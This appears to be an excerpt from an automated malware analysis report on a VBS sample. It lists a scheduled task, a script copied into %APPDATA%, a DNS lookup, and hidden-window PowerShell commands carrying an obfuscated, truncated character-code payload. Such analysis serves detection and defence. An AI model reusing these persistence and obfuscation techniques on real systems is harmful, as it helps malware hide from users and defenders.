Technical Information
- <SYSTEM32>\tasks\godjefinho
- %APPDATA%\<File name>.vbs
- DNS ASK google.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' $kkjfjkfjkfjfkjfkjfkfjkfjfkjkfjfkfjkfjkfjfjkf=@(100,111,32,123,36,112,105,110,103,32,61,32,116,101,115,116,45,99,111,110,110,101,99,116,105,111,110,32,45,99,111,109,112,32,103,111,111,103,108,1...' (with hidden window)
- '<SYSTEM32>\cmd.exe' /c copy "<PATH_SAMPLE>.vbs" "%APPDATA%" /Y' (with hidden window)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' $kkjfjkfjkfjfkjfkjfkfjkfjfkjkfjfkfjkfjkfjfjkf=@(100,111,32,123,36,112,105,110,103,32,61,32,116,101,115,116,45,99,111,110,110,101,99,116,105,111,110,32,45,99,111,109,112,32,103,111,111,103,108,1...
- '<SYSTEM32>\cmd.exe' /c copy "<PATH_SAMPLE>.vbs" "%APPDATA%" /Y